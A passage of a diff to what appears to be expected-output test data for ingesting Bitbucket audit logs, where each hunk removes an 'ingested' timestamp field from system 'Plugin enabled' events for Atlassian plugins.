enabled\"},\"affectedObjects\":[{\"name\":\"rome.rome-1.0\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"rome.rome-1.0\"}]}", "type": "info", "kind": "event" @@ -6021,7 +5920,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867781055Z", "original": "{\"timestamp\":\"2021-11-27T17:29:20.128Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bundles.json-schema-validator-atlassian-bundle\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bundles.json-schema-validator-atlassian-bundle\"}]}", "type": "info", "kind": "event" @@ -6075,7 +5973,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867782222Z", "original": "{\"timestamp\":\"2021-11-27T17:29:20.127Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-markup-renderers\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-markup-renderers\"}]}", "type": "info", "kind": "event" @@ -6129,7 +6026,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867783129Z", "original": "{\"timestamp\":\"2021-11-27T17:29:20.119Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-labels\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-labels\"}]}", "type": "info", "kind": "event" @@ -6183,7 +6079,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867784099Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.922Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-keyboard-shortcuts\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-keyboard-shortcuts\"}]}", "type": "info", "kind": "event" @@ -6237,7 +6132,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867785130Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.913Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-jira-development-integration\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-jira-development-integration\"}]}", "type": "info", "kind": "event" @@ -6291,7 +6185,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867786110Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.896Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-repository-ref-sync\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-repository-ref-sync\"}]}", "type": "info", "kind": "event" @@ -6345,7 +6238,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867787055Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.622Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.remote-link-aggregator-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"3.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.remote-link-aggregator-plugin\"}]}", "type": "info", "kind": "event" @@ -6399,7 +6291,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867788045Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.613Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-remote-event-common-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.3.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-remote-event-common-plugin\"}]}", "type": "info", "kind": "event" @@ -6453,7 +6344,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867789094Z", "original": "{\"timestamp\":\"2021-11-27T17:29:19.602Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-nav-links-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-nav-links-plugin\"}]}", "type": "info", "kind": "event" @@ -6507,7 +6397,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867790323Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.850Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugin.atlassian-spring-scanner-annotation\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.2.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugin.atlassian-spring-scanner-annotation\"}]}", "type": "info", "kind": "event" @@ -6561,7 +6450,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867791323Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.849Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-jira-commit-checker\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-jira-commit-checker\"}]}", "type": "info", "kind": "event" @@ -6615,7 +6503,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867792312Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.770Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-instance-migration\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-instance-migration\"}]}", "type": "info", "kind": "event" @@ -6669,7 +6556,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867793244Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.764Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-importer\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-importer\"}]}", "type": "info", "kind": "event" @@ -6723,7 +6609,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867794403Z", "original": "{\"timestamp\":\"2021-11-27T17:29:18.134Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-i18n\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-i18n\"}]}", "type": "info", "kind": "event" @@ -6777,7 +6662,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867795395Z", "original": "{\"timestamp\":\"2021-11-27T17:29:17.595Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-http-scm-protocol\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-http-scm-protocol\"}]}", "type": "info", "kind": "event" @@ -6831,7 +6715,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867796396Z", "original": "{\"timestamp\":\"2021-11-27T17:29:17.589Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-highlight\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-highlight\"}]}", "type": "info", "kind": "event" @@ -6885,7 +6768,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867797404Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.439Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-gpg\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-gpg\"}]}", "type": "info", "kind": "event" @@ -6939,7 +6821,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867798351Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.421Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-git-rest\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-git-rest\"}]}", "type": "info", "kind": "event" @@ -6993,7 +6874,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867799359Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.393Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-git-lfs\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-git-lfs\"}]}", "type": "info", "kind": "event" @@ -7047,7 +6927,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867800266Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.364Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.httpclient.atlassian-httpclient-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.2.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.httpclient.atlassian-httpclient-plugin\"}]}", "type": "info", "kind": "event" @@ -7101,7 +6980,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867801157Z", "original": "{\"timestamp\":\"2021-11-27T17:29:12.363Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-git\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-git\"}]}", "type": "info", "kind": "event" @@ -7155,7 +7033,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867802057Z", "original": "{\"timestamp\":\"2021-11-27T17:29:11.242Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-frontend\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-frontend\"}]}", "type": "info", "kind": "event" @@ -7209,7 +7086,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867803003Z", "original": "{\"timestamp\":\"2021-11-27T17:29:11.102Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-jira\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-jira\"}]}", "type": "info", "kind": "event" @@ -7263,7 +7139,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867803964Z", "original": "{\"timestamp\":\"2021-11-27T17:29:11.019Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-deployments\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-deployments\"}]}", "type": "info", "kind": "event" @@ -7317,7 +7192,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867804859Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.955Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-default-reviewers\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-default-reviewers\"}]}", "type": "info", "kind": "event" @@ -7371,7 +7245,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867806145Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.661Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-crowd-sso\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-crowd-sso\"}]}", "type": "info", "kind": "event" @@ -7425,7 +7298,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867807152Z", "original": "{\"timestamp\":\"2021-11-27T17:29:10.658Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin 